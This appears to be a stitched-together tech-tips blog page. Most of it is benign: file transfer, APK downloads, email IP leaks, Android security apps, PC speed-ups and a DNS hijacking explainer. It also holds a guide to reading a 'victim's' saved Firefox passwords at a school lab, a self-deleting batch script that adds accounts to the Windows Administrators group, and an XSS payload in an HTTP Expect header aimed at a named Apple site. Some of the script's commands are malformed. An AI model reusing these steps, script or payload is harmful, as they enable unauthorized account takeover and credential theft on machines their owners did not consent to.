Easily Transfer Files Between your Computers over Wi-Fi

Any Send (video demo) is a must-have software utility that will help you copy files between any two computers (PC-PC, PC-Mac, Mac-Mac) over your Wi-Fi network. You can move files of any type, there are virtually no limits on the file size and the transfers happen at a fast speed.
Transfer Files Between Computers
Easily transfer files between any two computers – Mac & PCs

Transfer files between Mac & Windows

With Any Send, you can transfer files between Windows computers or between your Mac and Windows PCs. They also have an Android app that will let you quickly send files from any Windows or Mac computer to your Android mobile phone or vice-versa.
To get started, you need to install the Any Send app on your computers. Then select one or more files that you wish to transfer to the other machine. Press Ctrl + C to copy these files to the clipboard, click the Any Send icon in the Windows task bar (or the Menu bar of your Mac), and select the other computer’s name. The file transfer will happen instantly.
In addition to files, you can also transfer entire folders from one computer to another without having to zip them first. Just select the folders, copy your selection to the clipboard and choose the destination computer from the Any Send icon.
Unlike most other alternatives for sharing files, Any Send is easy to setup and requires no configuration. The only condition is that all your computers (and Android phones) should be connected to the same Wi-Fi network.
You can download Any Send for your computer and phone at GetAnySend.com

Easy Way to Download APK Files from Google Play

Android apps are packaged as APK files. You can use any File Manager app to copy these files from the computer to your Android device and then touch the .apk file to install, or sideload, the corresponding app on your device.
There are various reasons why you may want to download the APK installer of an Android app from the Google Play store:
  1. Google Play Store says that a particular app or game is incompatible with your Android device though you know that the app would work just fine.
  2. Sometime an Android app may be not be available for download in the Google Play store of your region or country.
  3. An app is listed on the Google Play store but you want to install that app on another Android device, like the Amazon Kindle tablet, that doesn’t have the Play Store.



How to Download APK Files from Google Play Store

Evozi, an Android app developer, offers a one-click online APK download app that lets you download the APK installed of any Android app that’s listed on the Google Play store. The downloader app can be accessed at apps.evozi.com.
To get started, enter the web URL of any app listed on the Google Play store and click the “Generated Download Link” button. The APK download app will fetch the APK file from the Google Play store and will host it on its own servers from where you downlaod the file.
Since the APK files are directly fetched from the Google Play Store, it’s unlikely that the Android App will be infected with any malware. Also, to prevent app piracy, the APK downloader only lets you download free apps and games from the Google Play store, not the paid ones.

Is Your Outgoing Email Messages Leak Your IP Address ?

When you send an email to someone, the outgoing message may sometimes include the IP address of your computer that was used to send that message. The IP address is included inside the message header and, if available, it can help the recipient trace the approximate geographic location of the sender.
Not all email providers include the sender’s IP address in the outgoing email messages.
For instance, Gmail omits the sender’s IP address if you send mails through Gmail’s website or through Gmail’s mobile apps but the IP address gets included if you use a third-party program – like Microsoft Outlook or the Mail App on your iPhone – to send the message through your Gmail account. Outlook.com also hides the sender’s IP address while Yahoo Mail includes that information in the outgoing message headers.
If you would like to know if your email client is revealing your IP address to the recipients or not, you can either send an email to yourself and look at the message headers but if that sounds a bit too technical, give emailipleak.com a try.
When you open the site in your browser, it detect your computer’s IP address and creates a unique email address for you. You are required to send a blank message from your email client to that address. When the message arrives, the tool looks for your IP address in the headers of the incoming message and alerts you if a match is found.
The site’s privacy policy says that it does not collect any user information and the information is discarded immediately after any results pages are constructed.
Email IP address

Protect your Android Phone with these Security Apps

There are a plethora of security apps in the Google Play store that help you safeguard your Android phone and offer options that increase your chances of locating your lost (or stolen) device. The Lookout app was the most popular choice for determining the location of a lost phone but with Google’s own Android Device Manager available, Lookout can be skipped (unless your phone is running an older version of Android).
The Android Device Manager shows a list of all Android phones and tablets that are connected to your Google Account and helps you locate them on a Google Map. You can ring your phone (in case it is hiding beneath the pillow) from the browser, lock the device with a custom PIN or perform a factory reset which permanently deletes all the data on your phone.
Android Device Manager requires that the device is online – connected to mobile data or Wi-Fi – for you to remotely ring, lock or erase the phone. There’re however apps like Prey andWhere’s my Droid app that let you remotely send commands to your phone via text messages.
Android Security Apps
For instance, an SMS command like “GO PREY” to your lost phone from any other mobile phone will ring the phone, record its geo-location and also captures a picture with the front camera. You can also lock your phone, erase the data, show a system notification or take a picture on-demand through commands sent via text messages.
Both Prey and Where’s My Droid can be configured to send SMS alerts to another number should someone try to change the existing SIM card of your phone. That said, you should also activate the SIM lock on your Android phone (Settings -> Security -> Setup SIM Card lock) and the device will require a password whenever it is powered on.
When you are charging your cell phone at a public station, you either have to watch the device all the time or you can activate the Anti-Theft Alarm app and relax a bit. The app will trigger a siren sound when someone disconnects the charger and your phone screen will flash continuously until the correct pin is entered. You can go a step further and configure the app to trigger an alert when someone moves the phone even a few inches from the original position.
Another Android App LockWatch records the phone’s location and captures a picture with a front camera when someone attempts to unlock the phone but enters a wrong PIN or password. This information is send to your email address and it happen silently so the intruder would never know that their activity has been recorded.
If the device gets lost or stolen, it is important that you report the matter to your carrier and the police and they are likely to ask for details like the device’s IMEI number, IMSI, SIM number, etc. It helps if you can keep a record of this information somewhere outside your phone. You can find the IMEI number by dialing *#06# or get the SIM reader app and it will instantly extract the SIM and Device info that you can save to your email account.
One more thing. You have protected your Android phone with a numeric PIN or a more complex alphanumeric password but these are obviously inconvenient as you have type the string every time you turn on the screen. A free app called SkipLock makes you life a bit easier.
The app will basically remove the lock when you are connected to one of the recognized Wi-Fi networks and restores the lock as soon as you are on 3G or a non-recognized Wi-Fi network. Thus, the phone stays unlocked when you are home but as soon as you step out, the lock becomes active. Since the SkipLock app isn’t in the Google Play Store, you’ll have to enableUnknown Sources to install the APK file on your phone.

How To Hack Saved Password In Firefox ?

How to do ?

1. Open Firefox Web Broweser
2. Then Click on FireFox > Option > Option as shown in below picture


3. Then a POP Up box will appear, In that go to security and click on Show Passwords as show below.


4. Now click on website whose password you want to see ans click on show password as shown in below image. (Note: It will ask for confirmation so click on yes when dialog box appears)
 

5. Done, You have hacked password of your victim with few simple steps. You can try this at school computer lab if someone have saved their password. 
 

Hack Administrator from Guest

Hack Administrator Account from Guest Account.Yes!! that is quite possible.All you need to do is to follow the below procedure.



echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...

-----------------------------------------

ADMINISTRATOR IN WELCOME SCREEN.


When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.



EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!


Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

How to make you computer fresh and fast



Remove Useless software and apps : We often install many unnecessary application and later forget to uninstall them These application becomes burden in our computer and eventually slow down our computers So at first you need to delete all this unnecessary application and software To uninstall the software you should go to Control Panel->Add or remove->find and select the software you would like to uninstall.
Utilize your RAM performance : A lot of you may have these setting already set. But If you don’t have then don’t worry. You just have to follow the process. Right click on My computer->Properties->Advanced system settings->Setting(Under Performance)->Advanced->Change(Under Virtual Memory). Now double the number in Maximum size then the number initial size. It will surely help your PC to utilize the most of RAM.
Check for errors : Our computers face errors very oftenly in daily use and some errors stuck to our computer hard disk which makes our computer slow. So its very important to kill those errors to make our computer work better. Go to My computer and press enter .Our main hard disk is usually C: and we need this drive to be free from error So right click on Hard disk C and then click tools Then from the Error-Checking option click You may need to restart the computer to do so It will make your computer Faster.
Desktop-cleaning : We often keep unnecessary file in our desktop but it actually affects the performance of our computer. Delete the useless files or another choice is to move them to Local disk if necessary. You should only keep shortcuts in your Desktop only if you needed. If we keep Wallpapers on our desktop it also effect slightly to slow down our computer a blank screen is always better remove temporary internet files and cache from your web browser Browsing internet slow down our computer You need to clean these temporary files and cookies to make your computer stay clean and faster. There are a no. of software available today in the market which can do the task for you. You can use Ccleaner for this purpose which is a very trusted software. To proceed to the official website to download Click here
Disk Defragmentation : We should defragment our disk to make our PC faster. For deframentation process, just follow the same steps given below. Locate Hard disk C then click properties then click tools and then click defragment Now from the option Disk defragmentation.
Use a Trusted antivirus : he last but not the least tip is to use a reliable trusted antivirus which will protect your PC from harmful antivirus. Kaspersky and AVG are some of the trusted antivirus but you have to pay to use them. If you don’t wish to pay some money then you can also download free Microsoft security essential to save your computer from harmful Malware and spywares. Check the link here

DNS Hijacking: What it is and How it Works


DNS hijacking (sometimes referred to as DNS redirection) is a type of malicious attack that overrides a computer’s TCP/IP settings to point it at a rogue DNS server, thereby invalidating the default DNS settings. In other words, when an attacker takes control of a computer to alter its DNS settings so that it now points to a rogue DNS server, the process is referred to as DNS hijacking.
As we all know, the “Domain Name System (DNS)” is mainly responsible for translating a user friendly domain name such as “google.com” to its corresponding IP address “74.125.235.46″. Having a clear idea of DNS and its working can help you better understand what DNS hijacking is all about. If you are fairly new to the concept of DNS, I would recommend reading my previous post on How Domain Name System Works.

How DNS Hijacking Works?

As mentioned before, DNS is the one that is responsible for mapping the user friendly domain names to their corresponding IP addresses. This DNS server is owned and maintained by your Internet service provider (ISP) and many other private business organizations. By default, your computer is configured to use the DNS server from the ISP. In some cases, your computer may even be using the DNS services of other reputed organizations such as Google. In this case, you are said to be safe and everything seems to work normally.

But, imagine a situation where a hacker or a malware program gains unauthorized access to your computer and changes the DNS settings, so that your computer now uses one of the rogue DNS servers that is owned and maintained by the hacker. When this happens, the rogue DNS server may translate domain names of desirable websites (such as banks, search engines, social networking sites etc.) to IP addresses of malicious websites. As a result, when you type the URL of a website in the address bar, you may be taken to a fake website instead of the one you are intending for. Sometimes, this can put you in deep trouble!

What are the Dangers of DNS Hijacking?

The dangers of DNS hijacking can vary and depend on the intention behind the attack. Many ISPs such as “OpenDNS” and “Comcast” use DNS hijacking for introducing advertisements or collecting statistics. Even though this can cause no serious damage to the users, it is considered as a violation of RFC standards for DNS responses.
Other dangers of DNS hijacking include the following attacks:
Pharming: This is a kind of attack where a website’s traffic is redirected to another website that is a fake one. For example, when a user tries to visit a social networking website such as Facebook.com he may be redirected to another website that is filled with pop-ups and advertisements. This is often done by hackers in order to generate advertising revenue.
Phishing: This is a kind of attack where users are redirected to a malicious website whose design (look and feel) matches exactly with that of the original one. For example, when a user tries to log in to his bank account, he may be redirected to a malicious website that steals his login details.

How to Prevent DNS Hijacking?

In most cases, attackers make use of malware programs such as a trojan horse to carry out DNS hijacking. These DNS hacking trojans are often distributed as video and audio codecs, video downloaders, YoTube downloaders or as other free utilities. So, in order to stay protected, it is recommended to stay away from untrusted websites that offer free downloads. The DNSChanger trojan is an example of one such malware that hijacked the DNS settings of over 4 million computers to drive a profit of about 14 million USD through fraudulent advertising revenue.
Also, it is necessary to change the default password of your router so that it would not be possible for the attacker to modify your router settings using the default password that came with the factory setting. For more details on this topic you can read my other post on How to hack an Ethernet ADSL Router.
Installing a good antivirus program and keeping it up-to-date can offer a great deal of protection to your computer against any such attacks.

What if you are already a victim of DNS hijacking?

If you suspect that your computer is infected with a malware program such as DNSChanger, you need not panic. It is fairly simple and easy to recover from the damage caused by such programs. All you have to do is, just verify your current DNS settings to make sure that you are not using any of those DNS IPs that are blacklisted. Otherwise re-configure your DNS settings as per the guidelines of your ISP.

What is HTTP Header Injection Vulnerability


HTTP Header

HTTP Header is the component of HTTP requests and responces. Header fields are transimitted with each request and responce and carry additional data about the requests and responces.

See the typical request and responce headers Here at Web-Sniffer.net

HTTP header injection

HTTP header injection is a kind of web application vulnerability which exists on those web applications that generatd HTTP headers based on the input given by users. If it uses User based input in the headers, it can be used for HTTP response splitting, cross-site scripting (XSS), Session fixation via the Set-Cookie header, and malicious redirects attacks via the location header.


I recently found a similar kind of vulnerability in http://canadaedu.apple.com and for this I was also acknowledged by Apple on its website.

It used apache 1.3.33 that was vulnerable to the HTML and malicious javascript injection through  "Expect" header.

See the responce header of the website:
GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: canadaedu.apple.com
Cookie: PHPSESSID=3b8026225d719c6945155129c5c7335d
Connection: Close
Expect: <script>alert(411731119275)</script>
Pragma: no-cache
The alert box added in the Expect field could be injected for Cross Site Scripting.